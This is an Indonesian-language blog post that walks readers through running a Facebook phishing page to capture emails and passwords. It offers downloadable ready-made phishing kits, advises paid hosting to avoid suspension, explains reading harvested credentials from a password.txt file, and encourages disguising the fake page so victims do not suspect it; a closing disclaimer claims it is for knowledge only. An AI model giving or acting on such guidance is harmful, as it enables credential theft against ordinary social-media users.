Posted by : Arief Hilman Nugraha Wednesday, April 17, 2013

Mungkin sebagian besar dari sobat sudah tau apa itu web phising dan sudah tau bagaimana cara membuat serta menguploadnya ke salah satu web hoting yang tersedia... Namun saya yakin diantara sobat masih ada yang belum tau dan paham apa itu web phising serta belum tau bagaimana cara menghosting web tersebut ke webhosting yang tersedia. 

Nah pada kesempatan ini saya akan menjelaskan bagaimana cara Membuat Web Phising untuk Mendapatkan Email dan Password beserta Bagaimana cara menghosting filenya...
Sebelum saya menjelaskan cara membuat website phising ini, alangkah baiknya bila sobat mengetahui apa itu Web Phising dan Apa kegunaannya...!!! Web Phising halaman fake login atau halaman palsu dari sebuah website (contoh : halaman utama facebook) dan keguanan dari web phising ini yakni untuk mendapatkan informasi sensitif, seperti email/username, password dan lain sebagainya... 

Sobat bisa mendownload yang sudah siap pakai:

Download Facebook Phishing

Download Facebook Phishing for Mobile

Selanjutnya, Upload filenya ke webhost yang sobat punya. Saran saya agar tidak cepat di suspended, hosting filenya ke webhost yang berbayar, tapi kalau tidak punya uang, sobat bisa gunakan webhost yang gratis.

Untuk tutorial membuat Hosting, silahkan baca Cara Membuat Hosting Gratis Di Idhostinger

Setelah Semua File di upload, sobat tinggal mencobanya. sebelumnya dicek dulu apakah Phisingnya bekerja atau tidak! 

untuk melihat Hasilnya, sobat cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt

Gunakan Kreatifmu agar Facebook Palsu sobat ga dicurigai sebagai Phishing!Sebagai contoh ane kasi liat punya ane... 

DEMO PHISHING FACEBOOK  

 Semoga bermanfaat...!!!

NB : Tutorial ini hanya untuk menambah pengetahuan di bidang IT, bukan untuk disalahgunakan dan saya tidak bertanggung jawab jika ada pihak tertentu yang menyalahgunakan web phising ini...!!!

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Berlangganan Lewat Email

Subscribe via Email

Translate

Lagu

- Copyright © Arief Hilman Nugraha - Robotic Notes - Disponsori Oleh Blogger - Editing by Arief Hilman Nugraha -